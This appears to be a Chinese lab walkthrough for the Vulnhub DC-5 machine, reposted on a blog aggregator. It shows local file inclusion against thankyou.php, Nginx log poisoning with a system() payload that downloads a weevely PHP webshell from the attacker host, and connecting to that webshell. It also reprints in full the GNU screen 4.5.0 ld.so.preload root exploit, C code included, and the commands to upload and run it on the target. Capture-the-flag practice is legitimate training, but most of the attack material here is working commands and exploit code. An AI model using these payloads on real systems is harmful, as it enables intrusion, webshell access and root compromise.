热门标签
热门文章
- 1SpringBoot整合Rabbitmq踩坑记录_springboot rabbitmq port修改不生效
- 2【Python】总结print()多种输出格式_python print 格式
- 32022-09-12Docker基础_creating rootnode subnodes
- 4数据处理(一)数据清洗_如果要按内逻辑清洗数据
- 5Flink流处理案例:实时数据聚合
- 6FPGA中LUT、 LATCH 、FF_lut ff
- 7C#创建Windows服务与服务的安装、卸载_c# serviceinstaller
- 8人工智能该如何学习?详细的AI学习路线与资料推荐_如何学习ai_ai 学习资料
- 9本地访问服务器端的Neo4j数据库_浏览器访问neo4j
- 10Alternative to Receptive field in Transformers and what factors impact it
当前位置: article > 正文
Vulhub-DC-5靶场实战攻略_vulnhub cd-5
作者:神奇cpp | 2024-08-16 08:19:50
赞
踩
vulnhub cd-5
基于以上变化 考虑burp抓个包进行分析
尝试思路1:通过爆破去发现这个网站有哪些文件可以浏览
字典部分添加
Filenames-short 和
Filenames-long
http://192.168.206.139/thankyou.php?file=../../../../../../../../../etc/passwd
Nginx日志位置:
/var/log/nginx/error.log
/var/log/nginx/access.log
通过url提交的内容会先被url编码 那么我们考虑通过burp提交 神器提交的东西是原汁原味的 不会被url编码
那么我们可以考虑提交个一句话木马上去
接下来我们在攻击机中生成一个php木马 由于是root用户 默认生成在了/root目录下
weevely generate 123456 haha.php
接下来可以通过python开启一些http服务
(以下是python开启的命令) kali开启后目录默认在/home/kali
python -m SimpleHTTPServer
python3开启http服务的命令是
python -m http.server 端口号 parrot开启后目录默认在/root
python -m http.server 8000
chmod 777 haha.php
- GET /thankyou.php?file=/var/log/nginx/access.log&a=system('cd /tmp;wget http://192.168.206.136:8000/haha.php;chmod +x haha.php'); HTTP/1.1
- GET /thankyou.php?file=/var/log/nginx/access.log&a=system('cd /tmp;wget http://192.168.206.128:8000/haha.php;chmod +x haha.php'); HTTP/1.1
接下来开始用工具去执行该木马
weevely http://192.168.206.139/thankyou.php?file=/tmp/haha.php 123456
searchsploit screen 4.5.0
find / -name exploitdb
由于攻击机是parrot目录和kali不同
cp /opt/exploitdb/exploits/linux/local/41152.txt /home/user
cp /opt/exploitdb/exploits/linux/local/41154.sh /home/user
kali的目录是
cp /usr/share/exploitdb/exploits/linux/local/41152.txt /home/kali/41152.txt
cp /usr/share/exploitdb/exploits/linux/local/41154.sh /home/kali/41154.sh
这里由于情况特殊 把攻击机器换回kali 192.168.206.128
41152内容:
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)
The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.
> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$
Donald Buczek <address@hidden>
EDB Note: Follow up ~ http://seclists.org/oss-sec/2017/q1/184
41154内容:
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
执行方式
1.将第一段红字保存到相应目录下的libhax.c文件 并且进行gcc编译
2.将第二段红色文字保存到相应目录下的rootshell.c文件 然后gcc编译
3.最后 把最后一段红色文字保存到相应目录下的xxx.sh文件 放进去保存
4.最后
chmod 777 xxx.sh
进下来进入木马控制受害者的地方: 将编译成功的文件都放到root目录下 借助python服务器把文件传上去
- mv /tmp/libhax.so /home/kali/libhax.so
- mv /tmp/rootshell /home/kali/rootshell
- mv /tmp/clickme.sh /home/kali/clickme.sh
- cd /tmp
- wget http://192.168.206.128:8000/libhax.so
- wget http://192.168.206.128:8000/rootshell
- wget http://192.168.206.128:8000/clickme.sh
- cd /tmp
- chmod +x libhax.so
- chmod +x rootshell
- chmod +x clickme.sh
- ./xxx.sh
提权失败了 不过技术是正确的!!值得学习!
优化:
clickme.sh
#!/bin/bash
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
后期操作!
直接在url中把一句话木马通过post方式写入日志中 之后通过工具直接链接上线
由于权限不够无法上传文件 此时考虑把木马传到tmp目录下 之后通过文件包含或者直接访问
http://192.168.206.139/thankyou.php?file=../../../../../../../../tmp/miansha.php
但是发现问题是其只是包含进来了 但是没有办法执行任何功能!
目前只能先放弃对网站的操作了!由于文件不多 可以选择挨个下载
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/神奇cpp/article/detail/987329
推荐阅读
相关标签
